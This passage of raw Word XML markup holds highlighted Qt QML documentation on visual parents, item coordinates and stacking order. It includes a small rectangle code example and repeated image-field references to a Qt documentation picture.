        <w:t>properties takes that child into account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Declaring an item as a child of another does not automatically mean that the child item will be appropriately positioned or sized</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to fit within its parent. Some QML types may have in-built behaviors that affect the positioning of child items — for example, a</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1917" w:anchor="row" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Row</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">object automatically re-positions its children into a horizontal formation — but these are behaviors enforced by the types' own specific implementations. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additionally, a parent item will not automatically clip</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> its children to visually contain them within the parent's visual bounds, unless its</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1918" w:anchor="clip-prop" w:history="1">
        <w:r w:rsidRPr="003C7690">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>clip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property is set to true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The visual parent of an item </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may come under consideration</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in particular circumstances, as </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>described in the sections below</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1542" w:name="_Toc483000864"/>
      <w:bookmarkStart w:id="1543" w:name="_Toc483003857"/>
      <w:bookmarkStart w:id="1544" w:name="_Toc483604210"/>
      <w:bookmarkStart w:id="1545" w:name="_Toc483605430"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Item Coordinates</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1542"/>
      <w:bookmarkEnd w:id="1543"/>
      <w:bookmarkEnd w:id="1544"/>
      <w:bookmarkEnd w:id="1545"/>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>item coordinates</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>relative to the visual parent,</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> they </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be affected</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by changes to the visual hierarchy. See the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1919" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Visual Coordinates</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>concept page for more detail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1546" w:name="stacking-order"/>
      <w:bookmarkStart w:id="1547" w:name="_Toc483000865"/>
      <w:bookmarkStart w:id="1548" w:name="_Toc483003858"/>
      <w:bookmarkStart w:id="1549" w:name="_Toc483604211"/>
      <w:bookmarkStart w:id="1550" w:name="_Toc483605431"/>
      <w:bookmarkEnd w:id="1546"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stacking Order</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1547"/>
      <w:bookmarkEnd w:id="1548"/>
      <w:bookmarkEnd w:id="1549"/>
      <w:bookmarkEnd w:id="1550"/>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick items use a recursive drawing algorithm for determining which items are drawn on top in case of collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In general</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items are drawn on top of their parent items</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the order they were created</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>specified in the QML file</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>). So in the following example, the blue rectangle will be drawn on top of the green rectangle:</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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#272822"</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320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480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y</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64</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256</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256</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color</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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x</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64</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y</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172</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256</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256</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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"blue"</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60552B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png"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"http://doc.qt.io/qt-5/images/visual-parent-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1040" type="#_x0000_t75" alt="" style="width:237.3pt;height:352.5pt">
            <v:imagedata r:id="rId1920" r:href="rId1921"/>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00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>algorithm recurses through the visual item hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, any children of the green rectangle will also be drawn beneath the blue rectangle and beneath any of the blue rectangle's children.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="003C7690" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>St</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>acking order can be influenced with the</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7690">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1922" w:anchor="z-prop" w:history="1">
        <w:r w:rsidRPr="003C7690">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
